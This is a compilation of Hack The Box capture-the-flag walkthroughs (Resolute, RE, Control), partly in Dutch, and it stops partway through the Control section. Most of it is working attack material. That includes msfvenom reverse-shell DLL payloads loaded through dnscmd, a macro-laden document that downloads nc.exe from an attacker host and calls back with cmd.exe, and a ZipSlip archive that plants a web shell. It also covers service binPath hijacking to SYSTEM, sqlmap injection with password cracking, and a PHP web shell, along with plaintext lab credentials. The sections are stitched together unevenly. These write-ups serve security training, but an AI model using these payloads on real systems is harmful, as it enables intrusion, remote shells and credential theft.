Process ID: 2800 PSVersion: 5.1.14393.2273 PSEdition: Desktop PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273 BuildVersion: 10.0.14393.2273 CLRVersion: 4.0.30319.42000 WSManStackVersion: 3.0 PSRemotingProtocolVersion: 2.3 SerializationVersion: 1.1.0.1 ********************** ********************** Command start time: 20191203063515 ********************** PS>CommandInvocation(Out-String): "Out-String" >> ParameterBinding(Out-String): name="InputObject"; value="The syntax of this command is:" cmd : The syntax of this command is: At line:1 char:1 + cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123! + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : NotSpecified: (The syntax of this command is::String) [], RemoteException + FullyQualifiedErrorId : NativeCommandError cmd : The syntax of this command is: At line:1 char:1 + cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123! + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : NotSpecified: (The syntax of this command is::String) [], RemoteException + FullyQualifiedErrorId : NativeCommandError ********************** Windows PowerShell transcript start Start time: 20191203063515 Username: MEGABANK\ryan RunAs User: MEGABANK\ryan Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0) Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding Process ID: 2800 PSVersion: 5.1.14393.2273 PSEdition: Desktop PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273 BuildVersion: 10.0.14393.2273 CLRVersion: 4.0.30319.42000 WSManStackVersion: 3.0 PSRemotingProtocolVersion: 2.3 SerializationVersion: 1.1.0.1 ********************** *Evil-WinRM* PS C:\PSTranscripts\20191203>
I found a lot of useful information including user Ryan (probably a System Administrator), link to backups, system files location etc.
next use EvilWinRM again to login as Ryan.
kali@kali:/opt/evil-winrm$ ruby evil-winrm.rb -i 10.10.10.169 -u ryan -p Serv3r4Admin4cc123! Evil-WinRM shell v2.3 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\ryan\Documents> dir -force Directory: C:\Users\ryan\Documents Mode LastWriteTime Length Name ---- ------------- ------ ---- d--hsl 9/27/2019 7:05 AM My Music d--hsl 9/27/2019 7:05 AM My Pictures d--hsl 9/27/2019 7:05 AM My Videos *Evil-WinRM* PS C:\Users\ryan\Documents>
*Evil-WinRM* PS C:\Users\ryan\Documents> whoami megabank\ryan *Evil-WinRM* PS C:\Users\ryan\Documents> whoami /groups GROUP INFORMATION ----------------- Group Name Type SID Attributes ========================================== ================ ============================================== =============================================================== Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group MEGABANK\Contractors Group S-1-5-21-1392959593-3013219662-3596683436-1103 Mandatory group, Enabled by default, Enabled group MEGABANK\DnsAdmins Alias S-1-5-21-1392959593-3013219662-3596683436-1101 Mandatory group, Enabled by default, Enabled group, Local Group NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group Mandatory Label\Medium Mandatory Level Label S-1-16-8192 *Evil-WinRM* PS C:\Users\ryan\Documents>
The user ryan is found to be a member of DnsAdmins . Being a member of the DnsAdmins group allows us to use the dnscmd.exe to specify a plugin DLL that should be loaded by the DNSservice. kali@kali:~/htb/resolute$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.13 LPORT=4444 --platform=windows -f dll > plugin.dll [-] No arch selected, selecting arch: x64 from the payload No encoder or badchars specified, outputting raw payload Payload size: 460 bytes Final size of dll file: 5120 bytes or we use: msfvenom -p windows/x64/exec cmd='net user administrator P@s5w0rd123! /domain' -f dll > da.dll Transferring this to the box would likely trigger Windows Defender, so we can use Impacket's smbserver.py to start an SMB server and host the dll remotely. kali@kali:~/htb/resolute$ sudo python3 smbserver.py share ./ Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation [*] Config file parsed [*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0 [*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0 [*] Config file parsed [*] Config file parsed [*] Config file parsed [*] Incoming connection (10.10.10.169,50628) [*] AUTHENTICATE_MESSAGE (MEGABANK\RESOLUTE$,RESOLUTE) [*] User RESOLUTE\RESOLUTE$ authenticated successfully [*] RESOLUTE$::MEGABANK:4141414141414141:283a502fc11be6ad1ec4fa0aa4cabfba:010100000000000080db3d319d56d601c17a65539582e7de0000000001001000750078006f0050004f0058005300650003001000750078006f0050004f00580053006500020010006200620042005700410073006300430004001000620062004200570041007300630043000700080080db3d319d56d601060004000200000008003000300000000000000000000000004000001d931475038242cfeeee05844da428985f415e4fa4005bcd9cf845e6c9bda5510a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00310033000000000000000000 [*] Disconnecting Share(1:IPC$) [*] Disconnecting Share(2:SHARE) [*] Handle: 'ConnectionResetError' object is not subscriptable [*] Closing down connection (10.10.10.169,50628) [*] Remaining connections [] *Evil-WinRM* PS C:\Users\ryan\Documents> dnscmd resolute /config /serverlevelplugindll \\10.10.14.13\share\plugin.dll *Evil-WinRM* PS C:\Users\ryan\Documents> sc stop dns *Evil-WinRM* PS C:\Users\ryan\Documents> sc start dns kali@kali:~/htb/resolute$ nc -nlvp 4444 listening on [any] 4444 ... connect to [10.10.14.13] from (UNKNOWN) [10.10.10.169] 50629 Microsoft Windows [Version 10.0.14393] (c) 2016 Microsoft Corporation. All rights reserved. C:\Windows\system32>hostname hostname Resolute C:\Windows\system32>whoami whoami nt authority\system Author: Puckiestyle
htb-re-nl
Zoals altijd eerst een nmap scan
root@kali:~/htb/re# nmap -p- -sT -oN nmapscan 10.10.10.144 Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-20 03:27 EST Stats: 0:00:25 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan Connect Scan Timing: About 14.92% done; ETC: 03:30 (0:02:23 remaining) Nmap scan report for 10.10.10.144 Host is up (0.029s latency). Not shown: 65533 filtered ports PORT STATE SERVICE 80/tcp open http 445/tcp open microsoft-ds
Ik vond de shares met behulp van
root@kali:~/htb/re# smbmap -H 10.10.10.144 -u guest -p '' [+] Finding open SMB ports.... [+] User SMB session establishd on 10.10.10.144... [+] IP: 10.10.10.144:445 Name: reblog.htb Disk Permissions ---- ----------- IPC$ READ ONLY malware_dropbox READ ONLY
vervolgens las ik de reblog.htb, en heb daarna een malicious odt file geupload, larer bleek dat het een ods file moest zijn.
In metasploit is er een exploit die zou moeten werken :
exploit/multi/misc/openoffice_document_macro
We hernoemen het verkregen bestand naar zip, en bewerken deze door de payload te vervangen door :
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE script:module PUBLIC "-//OpenOffice.org//DTD OfficeDocument 1.0//EN" "module.dtd"> <script:module xmlns:script="http://openoffice.org/2000/script" script:name="Module1" script:language="StarBasic"> Sub OnLoad Shell("certutil.exe -urlcache -split -f 'http://10.10.14.7/nc.exe' C:\Windows\System32\spool\drivers\color\nc.exe") Shell("C:\Windows\System32\spool\drivers\color\nc.exe 10.10.14.7 1111 -e cmd.exe") End Sub </script:module>
root@kali:~/htb/re# smbclient //reblog.htb/"malware_dropbox" -u blah Try "help" to get a list of possible commands. smb: \> ls . D 0 Wed Jan 22 02:19:02 2020 .. D 0 Wed Jan 22 02:19:02 2020 8247551 blocks of size 4096. 4294559 blocks available smb: \> put puckiestyle.odt putting file puckiestyle.odt as \puckiestyle.odt (28.8 kb/s) (average 28.8 kb/s) smb: \>
root@kali:~/htb# python3 -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... 10.10.10.144 - - [22/Jan/2020 04:03:03] "GET /nc.exe HTTP/1.1" 200 - 10.10.10.144 - - [22/Jan/2020 04:03:04] "GET /nc.exe HTTP/1.1" 200 - 10.10.10.144 - - [22/Jan/2020 04:03:53] "GET /nc.exe HTTP/1.1" 200 - 10.10.10.144 - - [22/Jan/2020 04:03:53] "GET /nc.exe HTTP/1.1" 200 - root@kali:~/htb/re# smbclient //reblog.htb/"malware_dropbox" -u blah Try "help" to get a list of possible commands. smb: \> ls . D 0 Wed Jan 22 04:59:00 2020 .. D 0 Wed Jan 22 04:59:00 2020 8247551 blocks of size 4096. 4294527 blocks available smb: \> put facelesscoder.ods putting file facelesscoder.ods as \facelesscoder.ods (28.0 kb/s) (average 28.0 kb/s) smb: \> put facelesscoder.ods putting file facelesscoder.ods as \facelesscoder.ods (28.1 kb/s) (average 28.1 kb/s) smb: \>
hier is mijn gebruikte odt/ods bestand https://github.com/puckiestyle/pentest/blob/master/puckiestyle.ods.zip
root@kali:~# rlwrap nc -nlvp 1111 listening on [any] 1111 ... connect to [10.10.14.7] from (UNKNOWN) [10.10.10.144] 49675 Microsoft Windows [Version 10.0.17763.107] (c) 2018 Microsoft Corporation. All rights reserved. C:\Program Files\LibreOffice\program>whoami whoami re\luke C:\Program Files\LibreOffice\program> c:\Users\luke\Desktop>type user.txt type user.txt FE41736F5B9311E48E48B520D9F384D3
.
ZipSlip archie maken
Ik maakt een zipslip, door eerst in mijn kali box folders aan te maken \inetpub\wwwroot\blog
vervolgens copieerde ik hier puckieshell.ods hierheen
toen maakt ik het zipslip met
root@kali:/HTB/RE# zip temp.zip ../../../../../../../../inetpub/wwwroot/blog/puckieshell.aspx adding ../../../../../../../../inetpub/wwwroot/blog/puckieshell.aspx ( deflated 75%)
upload vervolgens dit zipslip.zip naar ods folder for analyse door vulerable WinRAR
c:\Users\luke\Documents>dir dir Volume in drive C has no label. Volume Serial Number is 4638-2C29 Directory of c:\Users\luke\Documents 06/18/2019 01:05 PM <DIR> . 06/18/2019 01:05 PM <DIR> .. 01/22/2020 03:28 AM <DIR> malware_dropbox 01/22/2020 03:28 AM <DIR> malware_process 01/22/2020 03:46 AM <DIR> ods 06/18/2019 09:30 PM 1,096 ods.yara 06/18/2019 09:33 PM 1,783 process_samples.ps1 03/13/2019 05:47 PM 1,485,312 yara64.exe 3 File(s) 1,488,191 bytes 5 Dir(s) 17,559,576,576 bytes free c:\Users\luke\Documents>whoami whoami re\luke c:\Users\luke\Documents>certutil -urlcache -split -f "http://10.10.14.7/puckiestyle.zip" "c:\Users\luke\Documents\ods\runme.rar" certutil -urlcache -split -f "http://10.10.14.7/puckiestyle.zip" "c:\Users\luke\Documents\ods\runme.rar" **** Online **** 0000 ... 322f CertUtil: -URLCache command completed successfully.
root@kali:~/htb# python3 -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... 10.10.10.144 - - [22/Jan/2020 08:16:30] "GET /nc.exe HTTP/1.1" 200 - 10.10.10.144 - - [23/Jan/2020 04:00:25] "GET /puckiestyle.zip HTTP/1.1" 200 -
`vervolgens opende ik de browser en ging naar de shell
Ik maakte eerst een folder c:\temp om daar mijn bestanden neer te zetten. En vervolgens starte ik een netcat sessie
root@kali:~/htb/re# rlwrap nc -nlvp 443 listening on [any] 443 ... connect to [10.10.14.7] from (UNKNOWN) [10.10.10.144] 49734 Microsoft Windows [Version 10.0.17763.107] (c) 2018 Microsoft Corporation. All rights reserved. C:\inetpub\wwwroot\blog>whoami whoami iis apppool\reblog
c:\Program Files\Sysinternals>accesschk -accepteula -uvwc * > c:\temp\accesscheck.txt accesschk -accepteula -uvwc * > c:\temp\accesscheck.txt Accesschk v6.12 - Reports effective permissions for securable objects Copyright (C) 2006-2017 Mark Russinovich Sysinternals - www.sysinternals.com
vervolgens ontdekte ik in accesscheck.txt dat NT AUTHORITY\SERVICE ook RW access had op UsoSvc
c:\Program Files\Sysinternals>type c:\temp\accesscheck.txt -knip- UserManager Medium Mandatory Level (Default) [No-Write-Up] RW NT AUTHORITY\SYSTEM SERVICE_ALL_ACCESS RW BUILTIN\Administrators SERVICE_ALL_ACCESS UsoSvc Medium Mandatory Level (Default) [No-Write-Up] RW NT AUTHORITY\SYSTEM SERVICE_ALL_ACCESS RW NT AUTHORITY\SERVICE SERVICE_ALL_ACCESS VaultSvc
Voor PrivEsc heb ik de usosvc gebruikt. ( eerst current bin path controleren, en daarna aanpassen, en als laatste de usosvc service stoppen en starten )
C:\inetpub\wwwroot\blog>sc config usosvc binPath="C:\temp\nc.exe 10.10.14.7 53 -e cmd"
sc config usosvc binPath="C:\temp\nc.exe 10.10.14.7 53 -e cmd"
[SC] ChangeServiceConfig SUCCESS
C:\inetpub\wwwroot\blog>reg query "HKLM\System\CurrentControlSet\Services\usosvc" /v "ImagePath"
reg query "HKLM\System\CurrentControlSet\Services\usosvc" /v "ImagePath"
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\usosvc
ImagePath REG_EXPAND_SZ C:\temp\nc.exe 10.10.14.7 53 -e cmd
C:\inetpub\wwwroot\blog>net stop usosvc
net stop usosvc
The Update Orchestrator Service service is not started.
More help is available by typing NET HELPMSG 3521.
C:\inetpub\wwwroot\blog>net start usosvc
net start usosvc
The service is not responding to the control function.
More help is available by typing NET HELPMSG 2186.
C:\inetpub\wwwroot\blog>
root@kali:~/htb/re# rlwrap nc -nlvp 53
listening on [any] 53 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.144] 49735
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>net user coby IEstyle
net user coby IEstyle
The command completed successfully.
C:\Windows\system32>net share root=C:\Users\administrator\desktop /grant:everyone,FULL
C:\Windows\system32>net use z: \\127.0.0.1\root /user:coby IEstyle
net use z: \\127.0.0.1\root /user:coby IEstyle
The command completed successfully.
C:\Windows\system32>z:
z:
Z:\>dir
dir
Volume in drive Z has no label.
Volume Serial Number is 4638-2C29
Directory of Z:\
04/14/2019 11:35 AM <DIR> .
04/14/2019 11:35 AM <DIR> ..
03/27/2019 05:37 AM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 17,572,204,544 bytes free
Z:\>type root.txt
type root.txt
1B4FB905423F4AD8D99C731468F7715D
Z:\>
Invoke-ServiceAbuse -Name "UsoSvc" -Command "\users\public\downloads\nc.exe 10.10.14.7 53 -e cmd"
Auteur : Puckiestyle
Protected: HTB-PLAYER-NL
Protected: HTB-SCAVENGER-NL
htb-control-nl
As always we start with a nmap scan
# Nmap 7.80 scan initiated Fri Jan 3 10:25:07 2020 as: nmap -sC -sV -oA control-nmap 10.10.10.167 Nmap scan report for 10.10.10.167 Host is up (0.033s latency). Not shown: 997 filtered ports PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 10.0 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 |_http-title: Fidelity 135/tcp open msrpc Microsoft Windows RPC 3306/tcp open mysql? | fingerprint-strings: | DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, HTTPOptions, Help, Kerberos, LDAPSearchReq, LPDString, RPCCheck, RTSPRequest, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServerCookie, X11Probe: |_ Host '10.10.16.70' is not allowed to connect to this MariaDB server 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port3306-TCP:V=7.80%I=7%D=1/3%Time=5E0F5CE5%P=x86_64-pc-linux-gnu%r(HTT SF:POptions,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.16\.70'\x20is\x20not\x2 SF:ookie,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.16\.70'\x20is\x20not\x2\x04Host\x20'10\.10\.16\.70'\x20is\x20not\x20allowed\x20to\x20conne SF:ct\x20to\x20this\x20MariaDB\x20server"); Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Fri Jan 3 10:25:32 2020 -- 1 IP address (1 host up) scanned in 25.52 seconds
There is a website hosted in the default tcp port called “Fidelity”

There are 4 pages, index page, an about page, Admin page and login page. The admin and login pages did not provide any login form, but with an error “Access Denied: Header Missing. Please ensure you go through the proxy to access this page“. This error pointing towards a misconfiguration. So I proceed to analyze the source-code.


The source-code of index.php has commented section with a message -To-do:
1
2
3
4
5
|
<em>< !— To Do: — >
Import Products
Link to new payment system
Enable SSL (Certificates location \192.168.4.28\myfiles)
< !— Header — ></em>
|
This revealed an internal IP address: 192.168.4.28d. I fire-up the burp to see if there is any requests being sent ot receives.

The Burp request also showed the request isn’t going to the webserver, but the same error comes if I request to access admin.php or login.php pages.
So, to access these either you need to have a proxy which allows you the access or simulate that you are using the proxy by adding HTTP header “X-Forwarded-For”. The Burp is useful to add such headers, so I’m going to use my already running Burp. I’m assuming that the IP 192.168.4.28 for x-forwarded-for IP (proxy) because this is the only internal IP I’ve found in the websites source-code and it actually worked.
1
|
Header X–Forwarded–For value ==> “192.168.4.28”
|
As soon as I forward the request in Burp, I was able to access the admin panel (or a product page).


SQLi
So the next step was to find the SQLi in the products table. I used burp to extract search requests from the database to use exploit it using SQLMAP.
The Info:
1
2
3
4
5
6
7
8
9
10
11
12
13
|
POST /search_products.php HTTP/1.1
Host: 10.10.10.167
User–Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,<em>/</em>;q=0.8
Accept–Language: en–US,en;q=0.5
Accept–Encoding: gzip, deflate
Referer: http://10.10.10.167/admin.php
Content–Type: application/x–www–form–urlencoded
Content–Length: 26
x–forwarded–for: 192.168.4.28
Connection: close
Upgrade–Insecure–Requests: 1
productName=D–Link+DWA–171
|

I saved the info as control.txt. and run the SQLMAP using this command: sqlmap –all -r control.txt –batch
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
|
root@kali~/htb/control/ sqlmap —all –r control.txt —batch
___
__H__
___ ___[)]_____ ___ ___ {1.3.12.1#dev}
|_ –| . [“] | .’| . |
|___|_ [‘]_|_|_|__,| _|
|_|V… |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user’s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 14:14:03 /2019-12-07/
[14:14:03] [INFO] parsing HTTP request from ‘control.txt’
[14:14:04] [INFO] testing connection to the target URL
[14:14:05] [INFO] testing if the target URL content is stable
[14:14:05] [INFO] target URL content is stable
[14:14:05] [INFO] testing if POST parameter ‘productName’ is dynamic
[14:14:05] [WARNING] POST parameter ‘productName’ does not appear to be dynamic
[14:14:05] [INFO] heuristic (basic) test shows that POST parameter ‘productName’ might be injectable (possible DBMS: ‘MySQL’)
[14:14:06] [INFO] heuristic (XSS) test shows that POST parameter ‘productName’ might be vulnerable to cross-site scripting (XSS) attacks
[14:14:06] [INFO] testing for SQL injection on POST parameter ‘productName’
it looks like the back-end DBMS is ‘MySQL’. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for ‘MySQL’ extending provided level (1) and risk (1) values? [Y/n] Y
[14:14:06] [INFO] testing ‘AND boolean-based blind – WHERE or HAVING clause’
[14:14:08] [INFO] testing ‘Boolean-based blind – Parameter replace (original value)’
[14:14:09] [INFO] testing ‘AND boolean-based blind – WHERE or HAVING clause (MySQL comment)’
[14:14:17] [INFO] testing ‘OR boolean-based blind – WHERE or HAVING clause (MySQL comment)’
[14:14:18] [WARNING] reflective value(s) found and filtering out
[14:14:19] [INFO] POST parameter ‘productName’ appears to be ‘OR boolean-based blind – WHERE or HAVING clause (MySQL comment)’ injectable (with –string=”36“)
[14:14:19] [INFO] testing ‘MySQL >= 5.5 AND error-based – WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)’
[14:14:19] [INFO] testing ‘MySQL >= 5.5 OR error-based – WHERE or HAVING clause (BIGINT UNSIGNED)’
[14:14:19] [INFO] testing ‘MySQL >= 5.5 AND error-based – WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)’
[14:14:19] [INFO] testing ‘MySQL >= 5.5 OR error-based – WHERE or HAVING clause (EXP)’
[14:14:19] [INFO] testing ‘MySQL >= 5.7.8 AND error-based – WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)’
[14:14:20] [INFO] testing ‘MySQL >= 5.7.8 OR error-based – WHERE or HAVING clause (JSON_KEYS)’
[14:14:20] [INFO] testing ‘MySQL >= 5.0 AND error-based – WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)’
[14:14:20] [INFO] POST parameter ‘productName’ is ‘MySQL >= 5.0 AND error-based – WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)’ injectable
[14:14:20] [INFO] testing ‘MySQL inline queries’
[14:14:20] [INFO] testing ‘MySQL >= 5.0.12 stacked queries (comment)’
[14:14:31] [INFO] POST parameter ‘productName’ appears to be ‘MySQL >= 5.0.12 stacked queries (comment)’ injectable
[14:14:31] [INFO] testing ‘MySQL >= 5.0.12 AND time-based blind (query SLEEP)’
[14:14:41] [INFO] POST parameter ‘productName’ appears to be ‘MySQL >= 5.0.12 AND time-based blind (query SLEEP)’ injectable
[14:14:41] [INFO] testing ‘Generic UNION query (NULL) – 1 to 20 columns’
[14:14:41] [INFO] testing ‘MySQL UNION query (NULL) – 1 to 20 columns’
[14:14:41] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[14:14:42] [INFO] ‘ORDER BY’ technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[14:14:43] [INFO] target URL appears to have 6 columns in query
[14:14:43] [INFO] POST parameter ‘productName’ is ‘MySQL UNION query (NULL) – 1 to 20 columns’ injectable
[14:14:43] [WARNING] in OR boolean–based injection cases, please consider usage of switch ‘–drop-set-cookie’ if you experience any problems during data retrieval
POST parameter ‘productName’ is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 86 HTTP(s) requests:
—–
Parameter: productName (POST)
Type: boolean–based blind
Title: OR boolean–based blind – WHERE or HAVING clause (MySQL comment)
Payload: productName=–6916‘ OR 8776=8776#
Type: error-based
Title: MySQL >= 5.0 AND error-based – WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: productName=D-Link DWA-171′ AND (SELECT 3579 FROM(SELECT COUNT(*),CONCAT(0x7171706b71,(SELECT (ELT(3579=3579,1))),0x7176786b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)— EOXk
Type: stacked queries
Title: MySQL >= 5.0.12 stacked queries (comment)
Payload: productName=D–Link DWA–171‘;SELECT SLEEP(5)#
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: productName=D-Link DWA-171′ AND (SELECT 8534 FROM (SELECT(SLEEP(5)))nDKy)— xWso
Type: UNION query
Title: MySQL UNION query (NULL) – 6 columns
Payload: productName=D–Link DWA–171‘ UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7171706b71,0x524d51445050564746647064625a4359716b4f4a7853434262624572596a424b5a65535962454f57,0x7176786b71),NULL,NULL#
—
[14:14:43] [INFO] the back-end DBMS is MySQL
[14:14:43] [INFO] fetching banner
web server operating system: Windows 10 or 2016
web application technology: Microsoft IIS 10.0, PHP 7.3.7
back-end DBMS: MySQL >= 5.0
banner: ‘10.4.8–MariaDB‘
[14:14:44] [INFO] fetching current user
current user: ‘manager@localhost‘
[14:14:44] [INFO] fetching current database
current database: ‘warehouse‘
[14:14:44] [INFO] fetching server hostname
hostname: ‘Fidelity‘
[14:14:45] [INFO] testing if current user is DBA
[14:14:45] [INFO] fetching current user
current user is DBA: False
[14:14:45] [INFO] fetching database users
database management system users [6]:
[*] ‘hector‘@’localhost‘
[*] ‘manager‘@’localhost‘
[*] ‘root‘@’127.0.0.1‘
[*] ‘root‘@’::1‘
[*] ‘root‘@’fidelity‘
[*] ‘root‘@’localhost‘
[14:14:45] [INFO] fetching database users password hashes
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] Y
[14:14:46] [INFO] using hash method ‘mysql_passwd‘
what dictionary do you want to use?
[1] default dictionary file ‘/usr/share/sqlmap/data/txt/wordlist.tx_‘ (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[14:14:46] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] N
[14:14:46] [INFO] starting dictionary-based cracking (mysql_passwd)
[14:14:46] [INFO] starting 2 processes
[14:16:19] [INFO] cracked password ‘l3tm3!n‘ for user ‘manager‘
database management system users password hashes:
[*] hector [1]:
password hash: *0E178792E8FC304A2E3133D535D38CAF1DA3CD9D
[*] manager [1]:
password hash: *CFE3EEE434B38CBF709AD67A4DCDEA476CBA7FDA
clear–text password: l3tm3!n
[*] root [1]:
password hash: *0A4A5CAD344718DC418035A1F4D292BA603134D8
|
The SQLMAP successfully cracked the database and got me what I was looking for – usernames and passwords (in hash)
1
2
3
4
5
6
7
8
9
|
database management system users password hashes:
[*] hector [1]:
password hash: *0E178792E8FC304A2E3133D535D38CAF1DA3CD9D
[*] manager [1]:
password hash: *CFE3EEE434B38CBF709AD67A4DCDEA476CBA7FDA
clear–text password: l3tm3!n
[*] root [1]:
password hash: *0A4A5CAD344718DC418035A1F4D292BA603134D8
|
I can’t do anything with the passwords I have, I can’t log in to the system unless I upload the shell to get RCE from SQLi. So what I decided is to use Burp again to send my PHP payload to create a reverse shell inside the database system. I found several RCEs, but used this one. I modified a bit and my final payload would look like this:

Easier is to use
root@kali:~/htb/control# cat s2.php <?php echo shell_exec($_GET["cmd"]); ?> root@kali:~/htb/control# sqlmap -r req --dbms mysql --file-write=s2.php --file-dest="C:/Inetpub/wwwroot/s2.php" ___ __H__ ___ ___[.]_____ ___ ___ {1.3.8#stable} |_ -| . [)] | .'| . | |___|_ [(]_|_|_|__,| _| |_|V... |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 03:03:32 /2020-02-27/ [03:03:32] [INFO] parsing HTTP request from 'req' [03:03:32] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: productName (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: productName=-4687' OR 8277=8277# Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: productName=blah' AND (SELECT 1098 FROM(SELECT COUNT(*),CONCAT(0x716b6b7671,(SELECT (ELT(1098=1098,1))),0x717a717171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- SQcG Type: stacked queries Title: MySQL > 5.0.11 stacked queries (comment) Payload: productName=blah';SELECT SLEEP(5)# Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: productName=blah' AND (SELECT 7645 FROM (SELECT(SLEEP(5)))VIiw)-- ZBOf Type: UNION query Title: MySQL UNION query (NULL) - 6 columns Payload: productName=blah' UNION ALL SELECT NULL,CONCAT(0x716b6b7671,0x7474516e41764359637658616b4e77796557634a77594f6d7a4247674e4c5476696b6e4644446964,0x717a717171),NULL,NULL,NULL,NULL# --- [03:03:32] [INFO] testing MySQL [03:03:33] [INFO] confirming MySQL [03:03:33] [INFO] the back-end DBMS is MySQL web server operating system: Windows 10 or 2016 web application technology: Microsoft IIS 10.0, PHP 7.3.7 back-end DBMS: MySQL >= 5.0.0 (MariaDB fork) [03:03:33] [INFO] fingerprinting the back-end DBMS operating system [03:03:33] [INFO] the back-end DBMS operating system is Windows [03:03:34] [WARNING] potential permission problems detected ('Access denied') [03:03:34] [WARNING] time-based comparison requires larger statistical model, please wait........................ (done) do you want confirmation that the local file 's2.php' has been successfully written on the back-end DBMS file system ('C:/Inetpub/wwwroot/s2.php')? [Y/n] y [03:03:46] [INFO] the local file 's2.php' and the remote file 'C:/Inetpub/wwwroot/s2.php' have the same size (41 B) [03:03:46] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.10.10.167' [03:03:46] [WARNING] you haven't updated sqlmap for more than 208 days!!! [*] ending @ 03:03:46 /2020-02-27/ root@kali:~/htb/control#

POWERCAT REVERSE SHELL
Now, I need a reverse connection from the Control machine. Since the machine is windows, I would go for PowerShell reverse shells. After reading and a lot of research, I decided to use PowerCAT.
Setup:
- I download the PowerCAT.ps1 to the working directory
